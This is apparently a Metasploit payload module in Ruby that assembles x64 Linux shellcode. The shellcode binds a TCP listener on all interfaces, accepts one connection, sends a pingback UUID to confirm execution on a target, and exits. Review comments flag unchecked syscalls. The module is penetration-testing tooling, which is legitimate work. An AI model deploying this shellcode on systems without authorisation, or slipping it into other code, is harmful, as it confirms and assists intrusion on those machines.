Path: blob/master/modules/payloads/singles/linux/x64/pingback_bind_tcp.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Linux x64 "pingback" bind-TCP payload.
#
# The assembled shellcode opens a TCP socket bound to 0.0.0.0:LPORT, accepts a
# single connection, writes the pingback UUID to the peer and exits. It never
# spawns a shell: the framework only uses the UUID to confirm that the payload
# ran on the target.
module MetasploitModule
  # Byte length of the assembled shellcode. Any change to the assembly in
  # #generate must be reflected here (the framework's payload specs check it).
  CachedSize = 109

  include Msf::Payload::Linux::X64::Prepends
  include Msf::Payload::Single
  include Msf::Payload::Pingback
  include Msf::Payload::Pingback::Options

  # Registers the module metadata with the framework.
  #
  # @param info [Hash] caller-supplied overrides, merged by merge_info
  def initialize(info = {})
    metadata = {
      'Name' => 'Linux x64 Pingback, Bind TCP Inline',
      'Description' => 'Accept a connection from attacker and report UUID (Linux x64)',
      'Author' => [ 'bwatters-r7' ],
      'License' => MSF_LICENSE,
      'Platform' => 'linux',
      'Arch' => ARCH_X64,
      'Handler' => Msf::Handler::BindTcp,
      'Session' => Msf::Sessions::Pingback
    }
    super(merge_info(info, metadata))
  end

  # Assembles the bind-TCP pingback shellcode for the configured LPORT.
  #
  # @param _opts [Hash] unused; kept for interface compatibility
  # @return [String] raw x64 machine code
  def generate(_opts = {})
    lport = datastore['LPORT'].to_i

    # The first 8 bytes of a sockaddr_in, expressed as the 64-bit little-endian
    # integer that one `push rcx` lays out on the stack in struct order:
    #   sin_family = AF_INET (2), host byte order       -> pack 'v'
    #   sin_port   = LPORT, network byte order          -> pack 'n'
    #                (22 -> 0x00,0x16 ; 4444 -> 0x11,0x5c)
    #   sin_addr   = 0.0.0.0, i.e. listen on every interface
    sockaddr_head = [2, lport].pack('vn') + Rex::Socket.addr_aton('0.0.0.0')
    sockaddr_imm = format('0x%016x', sockaddr_head.unpack('Q<').first)

    self.pingback_uuid ||= generate_pingback_uuid
    # Hex UUID -> "0xab,0xcd,..." for a `db` directive, one operand per byte.
    uuid_bytes = pingback_uuid.scan(/.{1,2}/m).map { |pair| "0x#{pair}" }
    uuid_db = uuid_bytes.join(',')
    uuid_len = uuid_bytes.size

    # NOTE(review): only the socket() result is checked. bind/listen/accept
    # failures (port already in use, unprivileged low port, ...) are not
    # detected; execution presumably continues to the write with whatever
    # accept left in rdi and then exit(1)s. Adding checks would change the
    # shellcode length, so CachedSize would have to be updated alongside.
    asm = <<~ASM
      push rsi
      push rax                ; not consumed below; presumably scratch/alignment - TODO confirm

      ; fd = socket(AF_INET, SOCK_STREAM, IPPROTO_IP)
      push 0x29
      pop rax                 ; sys_socket
      cdq                     ; rdx = 0 (IPPROTO_IP); eax is positive
      push 0x2
      pop rdi                 ; AF_INET
      push 0x1
      pop rsi                 ; SOCK_STREAM
      syscall
      test rax, rax
      js failed               ; negative return = -errno

      xchg rdi, rax           ; rdi = listening fd
      mov rcx, #{sockaddr_imm}
      push rcx                ; sockaddr_in{AF_INET, htons(LPORT), INADDR_ANY} on the stack
      mov rsi, rsp
      push rsp
      pop rsi                 ; rsi = &sockaddr_in (same value mov already gave it)

      bind_sock:
      ; bind(fd, &sockaddr_in, sizeof(sockaddr_in))
      push 0x31
      pop rax                 ; sys_bind
      push 0x10
      pop rdx                 ; addrlen = 16 = sizeof(struct sockaddr_in)
      syscall

      listen_sock:
      ; listen(fd, 1)
      push 0x32
      pop rax                 ; sys_listen
      push 0x1
      pop rsi                 ; backlog
      syscall

      accept_peer:
      ; client = accept(fd, &peer, &peerlen)
      push 0x2b
      pop rax                 ; sys_accept
      cdq                     ; rdx = 0
      push rdx
      push rdx                ; 16 zero bytes for the peer sockaddr
      push rsp
      pop rsi                 ; rsi = &peer
      push 0x1c
      lea rdx, [rsp]          ; rdx = &peerlen; NOTE(review): 0x1c (28) is larger than the 16-byte buffer above, harmless for an AF_INET peer but 0x10 would describe it honestly
      syscall
      xchg rdi, rax           ; rdi = client fd (or -errno, unchecked)

      send_pingback:
      ; write(client, uuid, uuid_len)
      push #{uuid_len}
      pop rdx                 ; byte count
      call load_uuid_addr     ; pushes the address of the bytes that follow
      db #{uuid_db}           ; PINGBACK_UUID
      load_uuid_addr:
      pop rsi                 ; rsi = &uuid
      xor rax, rax
      inc rax                 ; sys_write
      syscall
      ; falls through into the exit below on success as well

      failed:
      ; exit(1)
      push 0x3c
      pop rax                 ; sys_exit
      push 0x1
      pop rdi
      syscall
    ASM

    Metasm::Shellcode.assemble(Metasm::X64.new, asm).encode_string
  end
end